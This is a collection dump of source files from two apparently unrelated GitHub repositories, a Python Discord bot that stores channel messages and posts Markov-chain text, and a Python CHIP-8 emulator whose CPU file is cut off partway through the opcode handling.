IgnoredChannel.delete().where(IgnoredChannel.channel_id == channel_id).execute()\n return await ctx.send(f'Channel <#{channel_id}> is no longer being ignored.')\n\n @commands.is_owner()\n @commands.command()\n async def clean_db(self, ctx: commands.Context):\n await ctx.send(\"Cleaning the bot's database...\")\n await self.bot.clean_db()\n return await ctx.send(\"Sucessfully cleaned the bot's database.\")\n\n\ndef setup(bot):\n bot.add_cog(ManagementCommands(bot))\n" }, { "alpha_fraction": 0.550761878490448, "alphanum_fraction": 0.5568395853042603, "avg_line_length": 38.33333206176758, "blob_id": "e6e4f1557fe2c1bfc13cdc67257fb432397fcd89", "content_id": "21a305e25ee8df1806192f2441bc0797f121c09d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11682, "license_type": "no_license", "max_line_length": 115, "num_lines": 297, "path": "/talk_bot/bot.py", "repo_name": 
"johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "import re\nimport sys\nimport json\nimport asyncio\nimport logging\nimport datetime\nfrom pathlib import Path\n\nimport discord\nfrom discord.ext import commands\n\nfrom talk_bot.orm.models import db, Message, IgnoredChannel\nfrom talk_bot.tasks.sender import send_messages\n\n\ndef load_settings() -> dict:\n \"\"\"\n Loads bot settings from 'settings.json' file\n\n Example settings file at 'settings.example.json'\n \"\"\"\n with open('settings.json', 'r') as f:\n return json.load(f)\n\n\nclass Bot(commands.Bot):\n def __init__(self, settings: dict):\n super().__init__(command_prefix=settings.get('prefix'), case_insensitive=True)\n self.settings = settings\n self.start_time = None\n self.app_info = None\n\n self.db_setup()\n self.remove_command('help')\n self.loop.create_task(self.track_start())\n self.loop.create_task(self.load_all_extensions())\n\n async def track_start(self):\n \"\"\"\n Waits for the bot to connect to discord and then records the time\n \"\"\"\n await self.wait_until_ready()\n self.start_time = datetime.datetime.utcnow()\n\n async def load_all_extensions(self):\n \"\"\"\n Attempts to load all .py files in /cogs/ as cog extensions\n \"\"\"\n await self.wait_until_ready()\n await asyncio.sleep(1) # ensure that on_ready has completed and finished printing\n disabled = ['__init__']\n cogs = [x.stem for x in Path('cogs').glob('*.py') if x.stem not in disabled]\n for extension in cogs:\n try:\n self.load_extension(f'cogs.{extension}')\n print(f'Loaded extension: {extension}')\n except Exception as e:\n error = f'{extension}\\n {type(e).__name__} : {e}'\n print(f'Failed to load extension {error}')\n print('-' * 10)\n\n async def on_ready(self):\n \"\"\"\n This event is called every time the bot connects or resumes connection.\n \"\"\"\n print('-' * 10)\n self.app_info = await self.application_info()\n print(f'Logged in as: {self.user.name}\\n'\n f'Using discord.py version: {discord.__version__}\\n'\n f'Owner: {self.app_info.owner}\\n'\n f'Prefix: {self.settings.get(\"prefix\")}\\n'\n f'Template Maker: SourSpoon / Spoon#7805')\n print('-' * 10)\n try:\n channel = self.get_channel(int(self.settings.get('messages_channel')))\n except (TypeError, ValueError):\n print(f'Error: Invalid messages channel: {self.settings.get(\"messages_channel\")}')\n sys.exit(1)\n try:\n delay = int(self.settings.get('messages_delay'))\n except (TypeError, ValueError):\n print(f'Error: Invalid messages delay: {self.settings.get(\"messages_delay\")}')\n sys.exit(1)\n self.loop.create_task(send_messages(channel, delay))\n await self.populate_db()\n\n async def on_message(self, message: discord.Message):\n \"\"\"\n This event triggers on every message received by the bot\n \"\"\"\n if message.author.bot:\n return # Ignore all bot messages\n # Only allow messages sent on a guild\n if message.guild:\n self.add_message(message)\n await self.process_commands(message)\n\n async def send_logs(self, e: Exception, tb: str, ctx: commands.Context = None):\n \"\"\"\n Sends logs of errors to the bot's instance owner as a private Discord message\n \"\"\"\n owner = self.app_info.owner\n separator = (\"_\\\\\" * 15) + \"_\"\n info_embed = None\n if ctx:\n info_embed = discord.Embed(title=\"__Error Info__\", color=discord.Color.dark_red())\n info_embed.add_field(name=\"Message\", value=ctx.message.content, inline=False)\n info_embed.add_field(name=\"By\", value=ctx.author, inline=False)\n info_embed.add_field(name=\"In Guild\", value=ctx.guild, inline=False)\n 
info_embed.add_field(name=\"In Channel\", value=ctx.channel, inline=False)\n try:\n await owner.send(content=f\"{separator}\\n**{e}:**\\n```python\\n{tb}```\", embed=info_embed)\n except discord.errors.HTTPException:\n logging.error(f\"{e}: {tb}\")\n try:\n await owner.send(\n content=f\"(Sending first 500 chars of traceback, too long)\\n{separator}\\n**{e}:**\"\n f\"\\n```python\\n{tb[:500]}```\",\n embed=info_embed\n )\n except Exception:\n await owner.send(content=\"Error trying to send error logs.\", embed=info_embed)\n\n def clean_db(self):\n \"\"\"\n Removes all Messages from DB that were sent by a Bot or in a NSFW channel and calls\n Bot.format_message() on the message's content to check for anything else that's wrong\n\n TODO: Refactor this to be non-blocking, currently blocks the bot for ~3 minutes with 17k messages in the DB\n \"\"\"\n for message in Message.select():\n channel = self.get_channel(message.channel_id)\n\n # Deletes message from database if it was sent in a channel that is now ignored\n ignored_channel = Message.select().where(Message.channel_id == channel.id)\n if ignored_channel:\n message.delete()\n continue\n\n # Deletes message if it was sent in a nsfw channel\n if channel:\n if channel.is_nsfw():\n Message.delete().where(Message.channel_id == channel.id)\n continue\n\n message.content = self.clean_message(message.content, message.channel_id)\n message.save()\n author = self.get_user(message.author_id)\n\n # Deletes message if it was sent by a bot\n if author:\n if author.bot:\n Message.delete().where(Message.author_id == author.id)\n\n def is_valid_message(self, message: discord.Message) -> bool:\n \"\"\"\n Checks if a message is valid to be put in the bot's database\n\n The message needs to be:\n - Sent in a not NSFW channel\n - From a non-bot user\n - Have 10 characters or higher\n - Not start with the bot's command prefix\n - Sent in a not ignored channel\n \"\"\"\n if message.channel.is_nsfw():\n return False\n if message.author.bot:\n return False\n if len(message.content) < 10:\n return False\n command_prefixes = {self.settings.get('prefix'), '!', '?', '+', '.'}\n is_command = (message.content.startswith(prefix) for prefix in command_prefixes)\n if is_command:\n return False\n is_ignored = IgnoredChannel.select().where(IgnoredChannel.channel_id == message.channel.id)\n if is_ignored:\n return False\n return True\n\n def add_message(self, message: discord.Message):\n \"\"\"\n Adds message details to database if:\n - If it wasn't sent in a NSFW channel\n - If it wasn't send by a bot\n - It it wasn't sent in an ignored channel\n - If it doesn't start with the bot's command prefix\n - If it doesn't have less than 10 characters\n \"\"\"\n if self.is_valid_message(message):\n Message.create(\n message_id=message.id,\n content=message.content,\n author_name=message.author.name,\n author_id=message.author.id,\n channel_id=message.channel.id,\n timestamp=message.created_at\n )\n\n def clean_message(self, content: str, channel_id: int) -> str:\n # Replaces all mentions to other users or roles in messages with just the names of the user\n # the mention was referring to\n # Also wraps @everyone and @here in in-line code so they don't mention anyone\n # Mentions to users are formatted like so: <@546527580715745290>\n # Mentions to roles are formatted like so: <@&546527580715745290>\n\n user_mentions = re.findall(r'(<@\\d+>)', content)\n for mention in user_mentions:\n user_id = re.search(r'\\d+', mention)\n user_id = user_id.group()\n user: discord.Member = 
self.get_user(int(user_id))\n if user:\n content = content.replace(mention, user.display_name)\n else:\n content = content.replace(mention, '')\n\n role_mentions = re.findall(r'(<@&\\d+>)', content)\n for mention in role_mentions:\n role_id = re.search(r'\\d+', mention)\n role_id = role_id.group()\n channel: discord.TextChannel = self.get_channel(channel_id)\n guild: discord.Guild = channel.guild\n role: discord.Role = guild.get_role(int(role_id))\n if role:\n content = content.replace(mention, role.name)\n else:\n content = content.replace(mention, '')\n\n content = content.replace('@everyone', '`@everyone`')\n content = content.replace('@here', '`@here`')\n\n return content\n\n async def populate_db(self):\n messages_to_add = []\n for channel in self.get_all_channels():\n # Ignore all channels that are not Text Channels (Like Voice Channels)\n if not type(channel) == discord.TextChannel:\n continue\n try:\n async for message in channel.history(limit=5_000):\n if self.is_valid_message(message):\n content = self.clean_message(message.content, message.channel.id)\n to_add = {\n \"message_id\": message.id,\n \"content\": content,\n \"author_name\": message.author.name,\n \"author_id\": message.author.id,\n \"channel_id\": message.channel.id,\n \"timestamp\": message.created_at\n }\n messages_to_add.append(to_add)\n except Exception:\n pass\n with db.atomic():\n for msg in messages_to_add:\n try:\n Message.insert(**msg).on_conflict(\n conflict_target=(Message.message_id,),\n preserve=(\n Message.message_id,\n Message.author_id,\n Message.author_name,\n Message.channel_id,\n Message.timestamp\n ),\n update={Message.content: msg.get('content')}).execute()\n except Exception as e:\n db.rollback()\n print(f'{e}: {msg}')\n print('Finished populating DB.')\n\n @staticmethod\n def db_setup():\n \"\"\"\n Setup the bot's database, creates necessary tables if not yet created\n \"\"\"\n db.connect()\n db.create_tables([Message, IgnoredChannel])\n db.close()\n\n\nasync def run(settings: dict):\n bot = Bot(settings=settings)\n try:\n await bot.start(settings.get('token'))\n except KeyboardInterrupt:\n await bot.logout()\n except discord.errors.LoginFailure:\n print(f\"Error: Invalid Token. 
Please input a valid token in '/talk_bot/settings.json' file.\")\n sys.exit(1)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run(settings=load_settings()))\n" }, { "alpha_fraction": 0.6932271122932434, "alphanum_fraction": 0.6932271122932434, "avg_line_length": 24.743589401245117, "blob_id": "773095a69e0d7d2316b8f671f1af4bd832468f73", "content_id": "caeb3ba1097feb7c744696878c0cd49995ac62a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1004, "license_type": "no_license", "max_line_length": 95, "num_lines": 39, "path": "/talk_bot/orm/models.py", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "import json\n\nimport peewee\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nwith open(os.path.join(BASE_DIR, 'orm', 'db_credentials.json'), 'r') as f:\n credentials = json.load(f)\n\ndb = peewee.PostgresqlDatabase(\n credentials['name'],\n user=credentials['user'],\n password=credentials['password'],\n host=credentials['host'],\n port=credentials['port']\n)\n\n# Uncomment the line below if you wish to use Sqlite instead of Postgres for the bot's database\n# db = peewee.SqliteDatabase('bot.db')\n\n\nclass Message(peewee.Model):\n message_id = peewee.BigIntegerField(null=True, unique=True)\n content = peewee.TextField()\n author_name = peewee.CharField()\n author_id = peewee.BigIntegerField()\n channel_id = peewee.BigIntegerField(null=True)\n timestamp = peewee.DateTimeField(null=True)\n\n class Meta:\n database = db\n\n\nclass IgnoredChannel(peewee.Model):\n channel_id = peewee.BigIntegerField()\n\n class Meta:\n database = db\n" }, { "alpha_fraction": 0.6089193820953369, "alphanum_fraction": 0.6234991550445557, "avg_line_length": 26.11627960205078, "blob_id": "8702586059ed4a439e6022145993cca24b29f208", "content_id": "b9b13e5aaada58d9864503b06c347b90af2da930", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1166, "license_type": "no_license", "max_line_length": 92, "num_lines": 43, "path": "/talk_bot/tasks/sender.py", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "import asyncio\nimport random\n\nimport discord\n\nfrom talk_bot.orm.models import Message\n\n\ndef make_pairs(data):\n for i in range(len(data) - 1):\n yield (data[i], data[i + 1])\n\n\ndef get_words() -> list:\n \"\"\"\n Gets the message content of all messages stored in the bot's database and returns a list\n of all individual words in those messages\n \"\"\"\n messages = Message.select()\n all_words = [m.content.split(' ') for m in messages]\n return [word for message in all_words for word in message]\n\n\ndef make_phrase(size: int = 30) -> str:\n words = get_words()\n pairs = make_pairs(words)\n word_dict = {}\n for word_1, word_2 in pairs:\n if word_1 in word_dict.keys():\n word_dict[word_1].append(word_2)\n else:\n word_dict[word_1] = [word_2]\n chain = [random.choice(words)]\n for i in range(size):\n chain.append(random.choice(word_dict[chain[-1]]))\n return ' '.join(chain)\n\n\nasync def send_messages(channel: discord.TextChannel, delay: int = 5, size: int = 30):\n while True:\n message = make_phrase(size)\n await channel.send(message)\n await asyncio.sleep(60 * delay)\n" }, { "alpha_fraction": 0.7475907802581787, "alphanum_fraction": 0.7487027645111084, "avg_line_length": 57.673912048339844, "blob_id": 
"b65b3677c392a837faeb39f787cbb2769c0cdf25", "content_id": "ee18325febde18924df5ea27f1a7e70f77ac39f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2698, "license_type": "no_license", "max_line_length": 272, "num_lines": 46, "path": "/README.md", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "# Talk-bot\n\n#### A discord bot that uses Markov chains to generate new messages from the ones the bot reads and sents them in another channel. Made in Python using the [discord.py](https://github.com/Rapptz/discord.py/tree/rewrite) library.\n\n***\n\nThe bot stores all messages from discord channels that he can reach (new or old) in a Postgres Database that were not sent by a Bot or in a NSFW channel (and some other formatting rules). \n\nFrom those messages it then makes up new messages using a markov chain logic and sends them back in a configured channel in `talk_bot/settings.json` every 5 minutes (by default, can be changed in the settings as well). \n\nThe bot could easily be changed to make use of a more robust message history and data to create better messages (perhaps with the use of Machine Learning). The code for creating and sending the messages is present at [`talk_bot/tasks/sender.py`](talk_bot/tasks/sender.py).\n\n***\n\n#### Setup\n\n- The bot requires Python 3.6 or higher to run\n\n- Dependencies are present in the `pyproject.toml` file and can be easily installed with [`poetry`](https://github.com/sdispater/poetry) with `$ poetry install`\n\n- Rename [`talk_bot/orm/db_credentials.example.json`](talk_bot/orm/db_credentials.example.json) to `db_credentials.json` and put in the database credentials for a Postgres database\n - Or, if you wish to use a Sqlite database, uncomment the `db = peewee.SqliteDatabase('bot.db')` line at [`talk_bot/orm/models.py`](talk_bot/orm/models.py)\n\n- Rename [`talk_bot/settings.example.json`](talk_bot/settings.example.json) to `settings.json` and edit in the needed fields\n\n - You can create a discord bot and get its token at https://discordapp.com/developers/applications/ (Do not share your token with anyone!)\n - `messages_channel` needs to be the ID of the channel you want the bot to send the generated messages to, you can get the ID of a channel in Discord by turning on the Developer Mode in the settings, and right-clicking a channel and pressing 'Copy ID'\n - `messages_delay` is the delay (in minutes) between messages the bot sends to the configured channel\n\n***\n\n#### Running\n\n- `$ cd talk_bot`\n- `$ python bot.py`\n\n***\n\n#### Discord Commands\n\n- `!ignore <channel>` Messages from ignored channels are not added to the database (not retro-active)\n - Requires the `Manage Channels` permission\n- `!ignore <channel>` Un-ignores a channel\n - Requires the `Manage channels` permission\n- `!clean_db` Deletes any messages already in the bot's database that don't meet the necessary criteria to be there, also deletes messages that were sent in a channel that is now ignored\n - Can only be used by the bot's instance Owner" }, { "alpha_fraction": 0.6105527877807617, "alphanum_fraction": 0.6482412219047546, "avg_line_length": 21.11111068725586, "blob_id": "20cadcb66ad38c225cab7f1c605ac22c3b365b6c", "content_id": "6b852795453f6248942625a2ff3838340be1e7e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 398, "license_type": "no_license", "max_line_length": 85, "num_lines": 18, "path": "/pyproject.toml", 
"repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "[tool.poetry]\nname = \"talk-bot\"\nversion = \"0.1.0\"\ndescription = \"\"\nauthors = [\"John Victor <[email protected]>\"]\n\n[tool.poetry.dependencies]\npython = \"^3.6\"\n\"discord.py\" = {git = \"https://github.com/Rapptz/discord.py.git\", branch = \"rewrite\"}\npeewee = \"^3.8\"\npsycopg2-binary = \"^2.7\"\n\n[tool.poetry.dev-dependencies]\npytest = \"^3.0\"\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n" }, { "alpha_fraction": 0.6008620858192444, "alphanum_fraction": 0.6011494398117065, "avg_line_length": 43.05063247680664, "blob_id": "7777c051412e0a5ae8f3b9b4e0cd7ce90eb60d22", "content_id": "31f883e04bb8e46da23a7e1bdee631bc7d2d3b28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3480, "license_type": "no_license", "max_line_length": 119, "num_lines": 79, "path": "/talk_bot/cogs/error_handler.py", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "import traceback\nimport datetime\nimport logging\n\nimport discord\nfrom discord.ext import commands\n\n\nclass CommandErrorHandler(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @staticmethod\n async def bot_check(ctx: commands.Context, **kwargs):\n \"\"\"This runs at the start of every command\"\"\"\n await ctx.trigger_typing()\n time = datetime.datetime.utcnow()\n msg = f\"'{ctx.command}' ran by '{ctx.author}' as '{ctx.invoked_with}' at {time}. with '{ctx.message.content}'\"\n logging.info(msg)\n print(msg)\n return True\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx: commands.Context, error: Exception):\n prefix = self.bot.settings.get('prefix')\n arguments_error = [\n commands.MissingRequiredArgument,\n commands.BadArgument,\n commands.TooManyArguments,\n ]\n command = None\n arguments = None\n if any([isinstance(error, arg_error) for arg_error in arguments_error]):\n if ctx.command.qualified_name == 'ignore':\n command = \"ignore\"\n arguments = f\"`<channel>`\"\n elif ctx.command.qualified_name == 'unignore':\n command = \"unignore\"\n arguments = f\"`<channel>`\"\n embed = discord.Embed(\n title=f\"Usage of command '{command}'\",\n description=f\"`<argument>` : Obrigatory\\n`(argument|default)` : Optional\\n\\n\"\n f\"{prefix}{command} {arguments}\\n\",\n color=discord.Colour.blue()\n )\n try:\n await ctx.send(embed=embed)\n except discord.errors.Forbidden:\n await ctx.send(\"Erro. Not enough permissions to send an embed.\")\n elif isinstance(error, commands.CommandNotFound):\n pass\n elif isinstance(error, commands.DisabledCommand):\n await ctx.send(\"This command is disabled.\")\n elif isinstance(error, commands.NoPrivateMessage):\n await ctx.send(\"This command can not be used in private messages.\")\n elif isinstance(error, commands.NotOwner):\n await ctx.send(\"This command can only be used by the bot's owner.\")\n elif isinstance(error, commands.MissingPermissions):\n permissions = [f\"***{perm.title().replace('_', ' ')}***\" for perm in error.missing_perms]\n await ctx.send(f\"You need the following permissions to do that: {', '.join(permissions)}\")\n elif isinstance(error, commands.CommandOnCooldown):\n await ctx.send(\n f\"You already used this comman recently. 
\"\n f\"Wait another {error.retry_after:.1f}s to use it again\"\n )\n elif isinstance(error, commands.BotMissingPermissions):\n permissions = [f\"***{perm.title().replace('_', ' ')}***\" for perm in error.missing_perms]\n await ctx.send(f\"I need the following permissions to do that: {', '.join(permissions)}\")\n elif isinstance(error, commands.errors.CheckFailure):\n await ctx.send(f\"You don't have permission to do that.\")\n else:\n await ctx.send(f\"Unknown error. The logs of this error have been sent to a Dev and will be fixed shortly.\")\n tb = ''.join(traceback.format_exception(type(error), error, error.__traceback__))\n await self.bot.send_logs(error, tb, ctx)\n\n\ndef setup(bot):\n bot.add_cog(CommandErrorHandler(bot))\n" } ]
7
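For reference, the phrase generator in `talk_bot/tasks/sender.py` above is a first-order Markov chain over consecutive word pairs. A minimal self-contained sketch of the same idea (the corpus here is hypothetical, and unlike `make_phrase` this version guards against a final word that has no recorded successor):

```python
import random

def build_chain(words):
    # Map each word to every word observed immediately after it,
    # mirroring make_pairs() plus the dict-building loop in make_phrase().
    chain = {}
    for w1, w2 in zip(words, words[1:]):
        chain.setdefault(w1, []).append(w2)
    return chain

def generate(words, size=10):
    chain = build_chain(words)
    out = [random.choice(words)]
    for _ in range(size - 1):
        successors = chain.get(out[-1])
        if not successors:  # dead end: the corpus's last word may have no successor
            break
        out.append(random.choice(successors))
    return ' '.join(out)

corpus = "the bot reads messages and the bot writes new messages".split()
print(generate(corpus))
```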
theyeeman/chip8-emulator
https://github.com/theyeeman/chip8-emulator
36de3cd962b6c8194c970f25b43fa73803cd6238
241ba2d9270060da76c02a2209e22ef7fa0161c8
5d9b9d447d9358fe633ee093ad9b8a2993b0b2b2
refs/heads/master
2023-06-14T20:05:57.650380
2021-07-12T14:20:29
2021-07-12T14:20:29
328,294,578
1
1
null
2021-01-10T03:23:17
2021-01-26T02:33:47
2021-01-28T22:44:00
Python
[ { "alpha_fraction": 0.5161290168762207, "alphanum_fraction": 0.5339038968086243, "avg_line_length": 29.089109420776367, "blob_id": "12de0bc61f02e59b6e93c5514719f9e9caf0eeef", "content_id": "5bea254f51e609f83c18be45ae739e50dd0055f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3038, "license_type": "no_license", "max_line_length": 96, "num_lines": 101, "path": "/.history/screen_20210125204341.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "# Screen class to handle initialization, drawing, and updating.\nfrom pygame import Color, display, draw\n\npixelOff = Color(0, 0, 0, 255)\npixelOn = Color(255, 255, 255, 255)\n\n# (top, left) is (0, 0)\n\nclass chip8_Screen:\n def __init__(self, scale):\n self.width = 64 * scale\n self.height = 32 * scale\n self.scale = scale\n self.pixelMap = []\n\n def initDisplay(self):\n display.init()\n self.surface = display.set_mode([self.width, self.height])\n self.clearScreen()\n self.update()\n\n def clearScreen(self):\n # Set all pixels on screen to off\n self.surface.fill(pixelOff)\n\n def setPixel(self, x, y):\n # Set a pixel in the buffer to be on at a specific x, y location. Need to call update()\n # to actually make it show on screen\n x_pos = x * self.scale\n y_pos = y * self.scale\n\n draw.rect(self.surface, pixelOn, (x_pos, y_pos, self.scale, self.scale))\n\n def resetPixel(self, x, y):\n # Set a pixel in the buffer to be off at a specific x, y location. Need to call update()\n # to actually make it show on screen\n x_pos = x * self.scale\n y_pos = y * self.scale\n\n draw.rect(self.surface, pixelOff, (x_pos, y_pos, self.scale, self.scale))\n\n def getPixel(self, x, y):\n # Return true if pixel at position (x, y) is on\n x_pos = x * self.scale\n y_pos = y * self.scale\n\n pixelState = self.surface.get_at((x_pos, y_pos))\n\n if (pixelState == pixelOff):\n return False\n else:\n return True\n \n def getPixelMap(self):\n # Store the current screen of pixels in a 2D array. Used for save states\n self.pixelMap.clear()\n tempMap = []\n\n for y in range(32):\n for x in range(64):\n if (self.getPixel(x, y)):\n tempMap.append(1)\n else:\n tempMap.append(0)\n self.pixelMap.append(tempMap.copy())\n tempMap.clear()\n\n def byteToPixel(self, x, y, byte):\n # Byte is 8-bits. 
Return whether pixel was turned off\n setVF = False\n\n for i in range(7, -1, -1):\n mask = 1\n if (byte & (mask << i) != 0):\n # Pixel at (x, y) commanded on\n if (not self.getPixel((x + 7 - i) % 64, y % 32)):\n # Pixel is off, so turn on this pixel\n self.setPixel((x + 7 - i) % 64, y % 32)\n else:\n # Pixel is already on, so turn this pixel off and set v[0xF]\n self.resetPixel((x + 7 - i) % 64, y % 32)\n setVF = True\n \n return setVF\n\n def getWidth(self):\n return self.width\n\n def getHeight(self):\n return self.height\n\n def getScale(self):\n return self.scale\n\n def update(self):\n # Update the screen with the buffer.\n display.flip()\n\n def destroy(self):\n # Destroy the current screen\n display.quit()" }, { "alpha_fraction": 0.4055970311164856, "alphanum_fraction": 0.449272096157074, "avg_line_length": 31.735801696777344, "blob_id": "9eb0d930db85c50a905d1faee7163479059af4ae", "content_id": "969392565e5b5fcfc79dcb0abc3b3a4b94819b6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13257, "license_type": "no_license", "max_line_length": 80, "num_lines": 405, "path": "/chip8.py", "repo_name": "theyeeman/chip8-emulator", "src_encoding": "UTF-8", "text": "\"\"\" CPU Emulator class. Handles initialization, CPU loop operation, and \nexecution of opcodes.\n\nOpcode information from http://devernay.free.fr/hacks/chip8/C8TECH10.HTM\n\"\"\"\n\nfrom random import randint\nimport winsound\nimport pygame\nimport save\nfrom pygame.locals import (\n K_1,\n K_2,\n K_3,\n K_4,\n K_q,\n K_w,\n K_e,\n K_r,\n K_a,\n K_s,\n K_d,\n K_f,\n K_z,\n K_x,\n K_c,\n K_v,\n K_F11,\n K_F12,\n KEYDOWN,\n KEYUP,\n)\n\nclass Chip8Emulator:\n\n def __init__(self, screen, speed):\n \"\"\"Initialize instance of CPU object. 
Set up all CPU registers, memory,\n        CPU variables, and load fontset into memory.\n        \"\"\"\n        pygame.init()\n        self.screen = screen\n        self.pc = 0x200                 # Program counter\n        self.ir = 0                     # Index Register\n        self.v = [0] * 16               # CPU Registers\n        self.op = 0x0                   # Current Opcode\n        self.sp = 0                     # Stack pointer\n        self.programMemoryStartAddress = 0x200\n        self.keyPressed = -1\n        self.memory = [0] * 4096\n        self.stack = [0] * 16\n        self.delayTimer = 0\n        self.soundTimer = 0\n        self.running = True\n        self.beepFreq = 2500\n        self.beepDuration = 10\n        self.speed = speed\n        self.saveState = save.Chip8SaveState()\n\n        fontSet = {\n            0: [0xF0, 0x90, 0x90, 0x90, 0xF0],\n            1: [0x20, 0x60, 0x20, 0x20, 0x70],\n            2: [0xF0, 0x10, 0xF0, 0x80, 0xF0],\n            3: [0xF0, 0x10, 0xF0, 0x10, 0xF0],\n            4: [0x90, 0x90, 0xF0, 0x10, 0x10],\n            5: [0xF0, 0x80, 0xF0, 0x10, 0xF0],\n            6: [0xF0, 0x80, 0xF0, 0x90, 0xF0],\n            7: [0xF0, 0x10, 0x20, 0x40, 0x40],\n            8: [0xF0, 0x90, 0xF0, 0x90, 0xF0],\n            9: [0xF0, 0x90, 0xF0, 0x10, 0xF0],\n            10: [0xF0, 0x90, 0xF0, 0x90, 0x90],\n            11: [0xE0, 0x90, 0xE0, 0x90, 0xE0],\n            12: [0xF0, 0x80, 0x80, 0x80, 0xF0],\n            13: [0xE0, 0x90, 0x90, 0x90, 0xE0],\n            14: [0xF0, 0x80, 0xF0, 0x80, 0xF0],\n            15: [0xF0, 0x80, 0xF0, 0x80, 0x80],\n        }\n\n        # Load font set into memory\n        i = 0\n        for font in fontSet.values():\n            for byte in font:\n                self.memory[i] = byte\n                i += 1\n        \n        # Create pygame event for timer handling\n        self.DECREMENT_TIMER = pygame.USEREVENT + 1\n        pygame.time.set_timer(self.DECREMENT_TIMER, 17)\n\n    def loadROM(self, file, offset):\n        \"\"\"Load the selected ROM into memory at the specified memory offset.\n        The CHIP8 CPU loads program memory starting at address 0x200.\n        \"\"\"\n        data = open(file, 'rb').read()\n        for index, byte in enumerate(data):\n            self.memory[index + offset] = byte\n\n    def _eventHandler(self):\n        # Handles events for closing pygame window, keypresses, sound timer\n        # beep, and save state. keyPressed value of -1 means invalid key.\n\n        for event in pygame.event.get():\n            if (event.type == pygame.QUIT):\n                self.running = False\n\n            elif (event.type == KEYDOWN):\n                if (event.key == K_F11):\n                    print(\"Saving current state\")\n                    self.saveState.saveSaveState(self)\n\n                elif (event.key == K_F12):\n                    if (self.saveState.isSaveStateValid()):\n                        print(\"Loading save state\")\n                        self.saveState.loadSaveState(self)\n                    else:\n                        print(\"No valid save state!\")\n\n                else:\n                    self.keyPressed = self._keyMap(event.key)\n\n            elif (event.type == KEYUP):\n                if (self.keyPressed == self._keyMap(event.key)):\n                    self.keyPressed = -1\n\n            elif (event.type == self.DECREMENT_TIMER):\n                self._decrementTimers()\n\n                if (self.soundTimer > 0):\n                    winsound.Beep(self.beepFreq, self.beepDuration)\n\n    def _keyMap(self, keys):\n        # Converts valid key press into hex value. Invalid key press is treated\n        # as no key pressed and has value -1.\n        \n        switcher = {\n            K_x: 0x0,\n            K_1: 0x1,\n            K_2: 0x2,\n            K_3: 0x3,\n            K_q: 0x4,\n            K_w: 0x5,\n            K_e: 0x6,\n            K_a: 0x7,\n            K_s: 0x8,\n            K_d: 0x9,\n            K_z: 0xA,\n            K_c: 0xB,\n            K_4: 0xC,\n            K_r: 0xD,\n            K_f: 0xE,\n            K_v: 0xF,\n        }        \n        return switcher.get(keys, -1)\n\n    def _fetchOpcode(self):\n        # Get opcode from memory at the location stored in the program\n        # counter. Need to read in 2 bytes from memory since each memory address\n        # holds only 1 byte and an opcode is 2 bytes in length. Increment the\n        # program counter after reading in opcode.\n        \n        self.op = 0x0\n        self.op = (self.memory[self.pc] << 8) | self.memory[self.pc + 1]\n        self.pc += 2\n\n    def _executeOpcode(self):\n        # Parse the opcode into variables. The format is 0x[msd][x][y][lsd]. 
kk\n # is the 2 smallest bytes and nnn is the 3 smallest bytes. An invalid\n # opcode will cause the program to quit.\n \n msd = self.op >> 12\n x = (self.op & 0x0F00) >> 8\n y = (self.op & 0x00F0) >> 4\n lsd = self.op & 0x000F\n kk = self.op & 0x00FF\n nnn = self.op & 0x0FFF\n\n if (msd == 0):\n if (lsd == 0):\n # 00E0 - CLS. Clear display\n self.screen.clearScreen()\n\n else:\n # 00EE - RET. Return from subroutine. Set PC to top of stack, \n # then decrement SP\n self.pc = self.stack.pop()\n self.sp -= 1\n\n elif (msd == 0x1):\n # 1nnn - JP addr. Set PC to nnn\n self.pc = nnn\n\n elif (msd == 0x2):\n # 2nnn - CALL addr. Increment SP, push current PC to stack, then \n # set PC to nnn\n self.stack.append(self.pc)\n self.pc = nnn\n self.sp += 1\n\n elif (msd == 0x3):\n # 3xkk - SE Vx, byte. Skip next instruction if Vx == kk \n # (increase PC by 2)\n if (self.v[x] == kk):\n self.pc += 2\n\n elif (msd == 0x4):\n # 4xkk - SNE Vx, byte. Skip next instruction if Vx != kk \n # (increase PC by 2)\n if (self.v[x] != kk):\n self.pc += 2\n\n elif (msd == 0x5):\n # 5xy0 - SE Vx, Vy. Skip next instruction if Vx == Vy \n # (increase PC by 2)\n if (self.v[x] == self.v[y]):\n self.pc += 2\n\n elif (msd == 0x6):\n # 6xkk - LD Vx, byte. Set Vx = kk\n self.v[x] = kk\n\n elif (msd == 0x7):\n # 7xkk - ADD vx, byte. Set Vx = Vx + kk\n self.v[x] += kk\n\n if (self.v[x] > 255):\n self.v[x] -= 256\n self.v[0xF] = 1\n\n elif (msd == 0x8):\n if (lsd == 0x0):\n # 8xy0 - LD Vx, Vy. Set Vx = Vy.\n self.v[x] = self.v[y]\n\n elif (lsd == 0x1):\n # 8xy1 - OR Vx, Vy. Set Vx = Vx OR Vy.\n self.v[x] = self.v[x] | self.v[y]\n\n elif (lsd == 0x2):\n # 8xy2 - AND Vx, Vy. Set Vx = Vx AND Vy.\n 